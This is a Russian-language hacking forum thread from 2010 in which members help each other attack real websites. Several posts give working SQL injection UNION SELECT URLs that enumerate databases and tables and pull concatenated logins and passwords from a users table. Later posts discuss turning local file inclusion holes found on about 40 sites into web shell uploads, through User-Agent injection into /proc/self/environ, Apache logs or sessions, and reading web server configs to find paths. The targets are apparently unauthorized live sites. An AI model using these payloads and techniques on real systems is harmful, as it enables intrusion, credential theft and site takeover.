HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.01.2010, 04:53
Ayowa
Новичок
Регистрация: 25.12.2009
Сообщений: 10
Провел на форуме:
76178

Репутация: 30
По умолчанию

Цитата:
Сообщение от a1ertso  
Есть скуль, версия 5, узнал нужную таблицу, колонки в ней, но когда делаю запрос вида:
site.ru/news.php?id=-1+union+select+version(),2,3+from+uzzerss-- кроме ошибки ничего не вижу... В чем может быть проблема? пробовал перевести в хэкс колонку и версию, но ничего толкового не вышло .
Имхо тут два варианта:
1. Либо нет доступа к самой таблице.
2. Либо табла находится в другой базе. Чтоб узнать базу пишем
asd.ru/yo.php?yo=-123+union+select+1,2,table_schema,4+from+informati on_schema.tables+where+table_name=0x757a7a65727373 +--+
Ну и соответственно выбираем union+select+1,2,group_concat(concat_ws(0x3a,log,p ass)),4+from+[table_schema].uzzerss+--+
 
Ответить с цитированием

  #2  
Старый 13.01.2010, 12:59
sqlinjector
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме:
60679

Репутация: 10
По умолчанию

Я чайник, по шаблону не получаеццо =((
в общем ситуация такая... делпю запрос
Цитата:
ввв.бла-бла-бла.ком/ID=1309+union+select+1,group_concat(database(),0x3 A,user(),0x3A,version()),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22+--
получаю это вот tava:root@localhost:5.0.27
Кодирую tava в 16-тиричную систему, получаю это 0x74617661
Делаю запрос на таблицы этой бд
Цитата:
ввв.бла-бла-бла.ком/ID=1309+union+select+1,group_concat(table_name+SEP ARATOR+0x0b)+FROM+information_schema.tables+WHERE+ table_schema=0x74617661,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+--
и мне пишут ошибку mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/www/.....

Последний раз редактировалось sqlinjector; 13.01.2010 в 13:02..
 
Ответить с цитированием

  #3  
Старый 13.01.2010, 13:31
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от sqlinjector  
Я чайник, по шаблону не получаеццо =((
в общем ситуация такая... делпю запрос

получаю это вот tava:root@localhost:5.0.27
Кодирую tava в 16-тиричную систему, получаю это 0x74617661
Делаю запрос на таблицы этой бд

и мне пишут ошибку mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/www/.....
ввв.бла-бла-бла.ком/ID=1309+union+select+1,group_concat(table_name+SEP ARATOR+0x3a),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+FROM+information_schema .tables+WHERE+ table_schema=0x74617661--
 
Ответить с цитированием

  #4  
Старый 13.01.2010, 13:51
sqlinjector
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме:
60679

Репутация: 10
По умолчанию

Спасибо Ctacok, понял свой косяк.. набрал ссылочку и получил эти вот ошибки..
Warning: extract() [function.extract]: First argument should be an array in /data/www/.../details.php on line 12...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 40...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 121...

Это с правами свфязано или запрос некорретный всетаки ?
 
Ответить с цитированием

  #5  
Старый 13.01.2010, 14:08
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от sqlinjector  
Спасибо Ctacok, понял свой косяк.. набрал ссылочку и получил эти вот ошибки..
Warning: extract() [function.extract]: First argument should be an array in /data/www/.../details.php on line 12...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 40...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 121...

Это с правами свфязано или запрос некорретный всетаки ?
Скинь в пм линк сайта, посмотрю.
 
Ответить с цитированием

  #6  
Старый 13.01.2010, 14:19
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
По умолчанию

Цитата:
detail.php?EventID=-88+union+select+1,2,group_concat(table_name),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 +FROM+information_schema.tables+where+table_schema =0x74617661
 
Ответить с цитированием

  #7  
Старый 13.01.2010, 14:40
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
По умолчанию

Ок.
Цитата:
detail.php?ID=34&MID=1400+union+select+1,group_con cat(table_Name+Separator+0x3a),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22+from+information _schema.tables+WHERE+table_schema=0x74617661--
Тот же сайт к сведению,просто там другая страница была.Кстати нормально всё работает,видимо он пробелы не удалил.
 
Ответить с цитированием

  #8  
Старый 14.01.2010, 20:04
Alf0x0ns
Новичок
Регистрация: 12.01.2010
Сообщений: 13
Провел на форуме:
61009

Репутация: 18
По умолчанию

нашел:
Где-то с 40 сайтов на которых присутствует уязвимость LFI:
На большой части с них присутствуют:
Код:
/proc/self/environ
/proc/self/status
/proc/self/fd/2
/proc/self/fd/7
/proc/self/fd/10
/proc/version
/proc/self/cmdline
/proc/devices
Практичыске я проверил вручную большую часть найденных уязвимостей на залития шелла.
Что и не дало ни 1 жданного результата (true).

Вопрос: с тех директорий что я показал выше на все из них можно заливать шелл?
Вопрос2: как узнавать директорию в которую нужно заливать шелл, если вывода ошибки нет!
Пока все!)

Последний раз редактировалось Alf0x0ns; 14.01.2010 в 23:06..
 
Ответить с цитированием

  #9  
Старый 14.01.2010, 23:40
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от Alf0x0ns  
нашел:
Где-то с 40 сайтов на которых присутствует уязвимость LFI:
На большой части с них присутствуют:
Код:
/proc/self/environ
/proc/self/status
/proc/self/fd/2
/proc/self/fd/7
/proc/self/fd/10
/proc/version
/proc/self/cmdline
/proc/devices
Практичыске я проверил вручную большую часть найденных уязвимостей на залития шелла.
Что и не дало ни 1 жданного результата (true).



Вопрос: с тех директорий что я показал выше на все из них можно заливать шелл?
Вопрос2: как узнавать директорию в которую нужно заливать шелл, если вывода ошибки нет!
Пока все!)
[censored]

а вот как заливать шелл будеш? тут уже нужно эксперементировать...

если присутствует /proc/self/environ пробуй с помощю user-agent'a подменить код на свой...

либо через логи апача, либо через сессии-но тут есть одно но, нужно знать путь

Последний раз редактировалось Iceangel_; 15.01.2010 в 02:25..
 
Ответить с цитированием

  #10  
Старый 14.01.2010, 23:48
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Цитата:
Сообщение от 547  
сама по себе уязвимость lfi дает возможность читать произвольные файлы в системе...
омг, что за чушь?=\

2 Alf0x0ns
советую ознакомиться с http://forum.antichat.ru/showpost.ph...2&postcount=11, думаю это частично решит твою проблему залития шеллов в данном случае

Цитата:
Вопрос: с тех директорий что я показал выше на все из них можно заливать шелл?
то что ты привел выше, не директории.

Цитата:
Вопрос2: как узнавать директорию в которую нужно заливать шелл, если вывода ошибки нет!
поиск и чтение конфигов вебсервера (к примеру /etc/httpd/conf/httd.conf)
поиск пхпинфо на самом сайте и сайтах рядом
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.